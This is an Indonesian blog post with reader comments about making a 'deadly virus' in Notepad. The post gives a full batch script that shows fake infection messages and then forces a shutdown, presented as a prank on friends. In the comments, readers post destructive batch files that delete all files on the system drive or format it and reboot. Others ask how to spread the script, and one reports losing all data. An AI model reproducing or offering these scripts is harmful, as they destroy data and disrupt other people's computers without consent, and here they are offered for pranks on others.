Pernak Pernik Camfrog Kuliner makanan asia


Contact Us
Camfrog nick: J_E (IM) (Add)
PIN BBM : 7427270C
WhatsApp : 085 702 005 400
Email : admin@downloadgratis34.com
My Room Camfrog : IAA

Cara Membuat Virus Mematikan

.
Share N Like on :

Artikel Terkait, Wajib Dibaca

Zatya Baja Item akan memberitau bagaimana membuat virus dengan notepad, ya, cukup dengan notepad saja. Virus yang akan kita buat yang aman-aman saja, hehe..selain untuk iseng dan mengerjai teman-teman kita yang sukanya usil.

Efek dari virus ini hanya menshutdown PC, dan lucunya: sebelum PC tershutdown akan muncul pesan-pesan teks yang menandakan komputer kamu telah terinfeksi virus ganas bin very ganas. Padahal ya hanya untuk menshutdown saja..haha

Ok, saatnya serius..Lets check it..



Silahkan copas alias copy paste kode dibawah ini di notepad kamu:


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM ZATYA BAJA ITEM
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”




Kemudian disimpan dengan nama terserah Kamu diakhiri .bat dan save type all file .
cth nya: Dancokboyo.bat


Zatya Disini hanya memberikan untuk berbagi dan sama-sama belajar. Dan terserah bagaimana Kamu menyikapinya dan menggunakannya.

Silahkan kasih komentar, saran dan kritik Kamu. Atau bahkan jika ada yang tau virus yang lebih maknyus silahkan d share di komentar di bawah ini! Thanks perhatiannya sobat..


Riri Hermawan -

Klik di atas untuk download

Masukkan email kamu di kolom bawah ini untuk berlangganan artikel, dan akan dikirim email secara otomatis setiap web ini update artikel, GRATIS:

Lalu buka inbox email kamu untuk confirm gan


Software, Tips Trik Lainnya, WAJIB BACA



Untuk Berkomentar N'Chat KLIK ==> Add Comment
Untuk menggunakan emoticon ini, gunakan kodenya di kotak komentar.Contoh :e:
:a: :b: :c: :d: :e: :f: :g: :h: :i:
:j: :k: :l: :m: :n: :o: :p: :q: :r:
:s: :t: :u: :v: :w: :x: :y: :z: :cf:

81 comments:

  1. nice post kawan, bisa d coba nich

    ReplyDelete
  2. wah... gak ada efek samping yang berbahaya khan??

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. Virusnya gak bgitu mematikan, masih bisa di deteksi anti virus saya..

    ReplyDelete
  5. wah asik nih hehe tapi gak parah efeknya kan ya? bahaya bahaya.nice post btw :P

    ReplyDelete
  6. Cara kerja untuk menshutdown komputer disebelah mana bro!!!
    Ajarin yah!!!:D

    ReplyDelete
  7. wah, gimana ya...? :)
    ada virus buat basmi viru gak? pesen ya

    Tks infonya

    ReplyDelete
  8. ha....ha.... bisa saja buat artikel kayaak tu...

    ReplyDelete
  9. salam sobat
    wah nice banget artikelnya
    ada virus ada anti virusnya juga,,tak usah khawatir.

    ReplyDelete
  10. salam sobat
    wah nice banget artikelnya
    ada virus ada anti virusnya juga,,tak usah khawatir.

    ReplyDelete
  11. sambil chat ama lho di yahoo gue beri komen juga he he he

    tapi udah kedetect ga nih virus buatan lho

    ReplyDelete
  12. Wah boleh juga neh info nya, saya save dulu yaa.. saya masukan ke arsip. Ada efek samping nya ga...?

    ReplyDelete
  13. bentar.. punya anti virusnya gk??
    trus tu aktif pas gmn??

    kan virus nyerang klo ad action tertentu

    ReplyDelete
  14. sip dah..slalu ada program buat ngerjain orang dsini wakaka

    ReplyDelete
  15. wah ni namanya informasi manteb

    thanks bro !

    ReplyDelete
  16. nice... keep sharing the information ok...
    patut dicoba nii..

    ReplyDelete
  17. namanya juga virus sobat lebih tua dari anti virus yg kita buat atau kita beli,baca artikel di blogku sobata bahaya anti virus goblok!! he he he sapa tau isa sama sama di sinergikan.salam indonesai damai.

    ReplyDelete
  18. This comment has been removed by a blog administrator.

    ReplyDelete
  19. xixixi...dulu pernah bikin yg bginian. asyik juga..

    ReplyDelete
  20. wah, mantap ini ilmunya baja hitam...
    mau coba ahhhhh bikin pirusnya...hahaha

    Tiap hari ada info terbaru... DO-FOLLOW..GRATISSSS..Ada program affiliate terbaru jg!! Ikutan yo...

    ReplyDelete
  21. wow.patut di coba nih. cuma pake notepad lagi.hebat..

    ReplyDelete
  22. waduh...seberapa mematikan kah....anyway nice post bro

    ReplyDelete
  23. eh... bang... bisa dibuatin virus untuk menangkal flu babi nggak ya?

    ReplyDelete
  24. @Rizky2009: Ok silahkan d coba..

    @Ica: gag brbahaya kok, cm wat iseng aja, direcommend kalo mw nyoba jgn d PC sendiri y

    @Ukind: Sory sobat, komentarmu SPAM, q hapus dah

    @Gema_gogo: y emg gag mematikan, cm wat usil aja

    @ocky fajzar suryani: haha..santai2..cm wat bersenang2 aj

    @Irawanqq: cara kerjanya y tgl klik 2x aja, shutdown tuh PC mu...tp d recommend cb dulu d PC lain.

    @Doblogger follow: wah apa ya, virus wat mbasmi virus? mlh blom pnh dgr q

    @Dark Read: haha..iy ne..wat ngisi posting ja sob..

    @Nura: yupz..betoel sob..thanks komennya

    @Nationalinks: wah ini dy se anak tambang...kedetek gag kedetek y sm aja ..cm wat iseng

    @Toni: cara aktifinnya tgl klik 2x aja..tp d recommend d cb dlu d PC lain

    @Harto: gag ada efek sampingna sob..akan bekerja jika telah d klik 2x..

    @Rizky kharisma: santai sob..udah bs kedetek kok..virus akan action jika file trsebut d klik 2x..

    @Gavinoz: ini dia sob..tempatnya orang usil

    @Obyek wisata pandeglang: yoi, sm2 sobat..

    @Blog kuliner: yupz..saatna action sob..haha

    @×÷·´¯`·.·•[ peace ]•·.·´¯`·÷× : ok deh..thanks share nya..lgsg k TKP

    @linkb97 : wah santai aja..bs d ganti kok,,asal pas kata2 q aja yg d ubah..soalnya kode na sensitif ky cwe sob..haha...tp muup y, km komennya SPAM..jd q hapus

    @Digital life: haha..usil jg ne ky na

    @Bony Hardian: emg ilmu zatya baja hitam sob..

    @vry_yeuh : tnyata notepad byk gunanya y..itu dia

    @finance4us : mematikan untuk usil sob..hehe

    @cahyadi: eh ada sob..wat numpas virus flu babi kan? caranya minumin tuh babi sama bodrex + vodka...mati dah virus babinya

    ReplyDelete
    Replies
    1. gw cuma heran aja bro, diatas katanya suruh copy paste,sedangkan ini ga bisa di copy sama skali..repot juga kalo harus ketik manual :(

      Delete
  25. belum di coba, takut nih ...makasih gan atas infonya ..

    ReplyDelete
  26. sip bro...
    asal jangan ganas beneran ...

    ReplyDelete
  27. wah patut di coba nih,good info.
    Tukeran banner sob banner anda telah saya pasang di blog saya

    ReplyDelete
  28. Hmmmm bagus nih Bro... ha..ha... udah kucoba tp gimana pakenya bro?

    ga otomatis jalan ta?
    Barusan aku coba double klik trus muncul pesan2 gitu tp koq PCku ga shutdown ya?

    ReplyDelete
  29. ini yang ku suka,,,patut di coba,kalu biasany buat cuma make notepade,buat ngisengin temen" hihihi ;))
    SALAM


    YOYOK

    ReplyDelete
  30. nambahin bro ;))

    Virus ini memang sederhana dan mudah pembuatannya. Tapi, sangat berbahaya karena virus ini
    akan menghilangkan data di hardisk C bagi komputer yang terinfeksi.
    Silahkan Copy+paste bahasa pemograman dibawah ini


    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00

    Simpan file dengan nama jangandiklik.bat


    :D :D

    ReplyDelete
  31. punyaku ga otomatis shutdown sob? kenapa?

    ReplyDelete
  32. wo... yang punya yoyok tak coba, tapi langsung kedetect sama kis 2010 wkwkwk.. :p

    itu cuma usil apa gimana?

    ReplyDelete
  33. suwun yo kang.....ilmunya tak simpen diblog..keparengg rumiyen..sembah sungkem..hehhehe

    ReplyDelete
  34. @ Learn SEO: wah knp tkut brow..sante ja..haha

    @ Referensi Aspal: Egk ganas kok..cm iseng aja

    @ Jay: ok deh..thanks..nnti saya pasang

    @ Ancis F Ama: Virus akan action jika udah d klik 2x..jika PC mu gag ter shutdown berarti sebelumnya PC km gag ada virusnya autorun..biang keroknya wscript.exe yg nimbrung di system32 km..wscript adalah yang menjalankan autorun dan virus yg d buat manual d posting q ini..

    @ YOYOK: wah, kalo yang anda buat ini berbahaya sob..alias delete smua ntar..haha.. thanks share bagi2 ilmunya y sob...

    @ Neilhoja: jawabannya seperti saudara Ancis F Ama yah...kemungkinan d PC bebas dr wscript.exe yg ada d system32 km...
    haha..kalo yg pny YOYOk itu serius, soalnya bs ngedelete yg d C dan D..

    @ Maz Whah Zhu: ok..silahkan

    ReplyDelete
  35. Ga beranilah main2 begini...nanti kuwalat

    ReplyDelete
  36. nice tips bro.........patut di coba nich

    ReplyDelete
  37. Ini script bagus bos...ini membuat PC kita jadi overload sehingga menyebabkan PC akan shutdown..

    Tetapi kalo parah (biasanya karena spek PC yang rendah) bisa menyebabkan "blue screen" tuh..Jadi harus matikan PC lewat tombol power...

    Infonya bagus - bagus bos...jadi gk tahan untuk comment nih..!!

    ReplyDelete
  38. Wah Info nya Mantaf Bro & Tengkiyu dah maen ke blog gw http://medianet28.blogspot.com Sukses Ttrusss Brooooooo

    ReplyDelete
  39. wo,,,,virus edan ki,,,,aq yo dwe virus seng apak go kwe,,,gelem ra???

    nek gelem tak gawekke,,,tapi ra ono penaware lo,,,cukup sekali klik,,,computer dalam beberapa menit akan mati,,,gmn zat mau coba gak???


    by,,,sandoraz...

    ReplyDelete
  40. INI sangat keren heheheheheheheh :D

    ReplyDelete
  41. coba dulu ya.tar klo dah d coba koment lebih lanjuthttp://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/35.gif

    ReplyDelete
  42. selamat malam sobat^^.. kunjungan balik...

    ReplyDelete
  43. wes. mantap tuh virus buatannya.:D

    ReplyDelete
  44. Wah,baguz niy....
    makasii yah....
    bisa dicoba! (;

    ReplyDelete
  45. wess.....seppp bgt... :))..... =))....

    ReplyDelete
  46. nice post sob.. exchanglink ya.. plese cek^

    ReplyDelete
  47. mau nyoba ah...biar orang pada bingung...........

    ReplyDelete
  48. waduh..
    virus2an manennya.. :(

    tp pen cb s..
    hmm.. klo yg it .. hm.. yg d klik".. berubah" bentuk gmn s?
    hehehe

    ReplyDelete
  49. :)) Lucu bangets. Thx ya, sob. Dah dicoba seru juga. He..he.., beberapa dah diubah dikit. Skali lagi thx yo... :X

    ReplyDelete
  50. mas sya mnta tolong
    tolong sya kirimin cra buat program yg bsa memblokir email
    kirim k lukman37@gmail.com

    ReplyDelete
  51. wah tanpa basa basi saya mohon ijin copast....


    oia selamat Idul Fitri bagi yang merayakannya...mohon maaf lahir dan batin

    ReplyDelete
  52. thank's omm anne cobba dolo yaa. ...
    di kompi sekolah tentunya. .... ;))

    ReplyDelete
  53. Thanks tas infox sob,oia gue dah punya puluhan virus di fd gue, mau ngga????law maw kirimi gue pesan yach sob di z@ymail.com oke????????

    ReplyDelete
  54. ekh salah.....virentsbwoyz@ymail.com

    ReplyDelete
  55. gan...
    itu di atas bikin virusnya pake bahasa apa...???
    ajarin dong...

    ReplyDelete
  56. lahh kok aku gak bisa ya....
    gak berfungsi sama sekali
    komputerku matipun gak sama sekali

    ReplyDelete
  57. cara nyebarinnya gmna gan ?

    ReplyDelete
  58. mantapppppppppppp!!!!!!!
    gw mgerjain org buanyakkkkk...maksi om zatya

    ReplyDelete
  59. thanks gan ...
    hahaha ......
    bermanfaat nie buat ngerjain guru gue ....
    hehehe ..
    peace ahhh ....

    ReplyDelete
  60. Trus kalo mo non aktifin-nya gimana gan ?

    ReplyDelete
  61. APA!!!!!! KOMPUTERKU DATA NYA ILANG SEMUA!!!!!!
    pasrah aja lah.......

    ReplyDelete
  62. bos mau nanya, punya YOYOK?? kalau del diganti sama format mana yg lebih mematikan bos...

    @echo off
    format %systemdrive% /q
    shutdown -r -f -t 00

    cara penulisan untuk format, karakter mana yang harus dibuang atau ditambah bos...
    mantap ini blog!!!

    ReplyDelete
  63. Keren bung ! :D ijin buat praktekin yah di kompi temen wkwkwkwk

    ReplyDelete
  64. yng bahaya script ini nih..
    shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”
    :f:

    ReplyDelete
  65. boleh juga nich..buat ngerjain teman kantor, tapi bgmn cara agar virus bualan ini nyangkut di komputer teman?????? Thanks ya!!!1

    ReplyDelete
  66. Mas,, apa ngak bahaya nih,,,

    saya takut kompi saya kenapa-napa lagi.....



    by: Indra

    ReplyDelete
  67. mas, saya kan udah coba buat nie,,,,


    tapi kok ngak jadi yah,,,??


    By:Indra

    ReplyDelete
  68. nice post :u: ,iya kode2 itu bisa diubah2 kan?

    ReplyDelete
  69. di simpan dalam 1 folder brow???
    trus cara nyebarin virusnya gmn?

    ReplyDelete
  70. @farlin: bisa sob, bs diubah, tapi yang bagian kat2 saja.. jgn yang lain

    @owan 87: cara nyebarin nya ya inisiatif kamu, hehe.. itu hanya untuk ngerjai orang aja.. trus dibikin heboh aja kalo itu kena virus, padahl cuma pertunjukan..

    ReplyDelete
  71. wahhh...mantappp...bisa ngerjain temen gw nehh...:gg:

    ReplyDelete
  72. :y: nice Blog, Mantap buat pembelajaran

    ReplyDelete
  73. mas tolong kirimin text nya lewat e-mail bisa gak..?
    soalnya gak bisa di copy di ketik sendiri malah ga jalan
    e-mail : rian_elktrik@yahoo.co.id
    mohon bantuannya ya.....

    ReplyDelete

 
Copyright 2014 . All Right Reserved | Sitemap | About Us | Privacy Policy |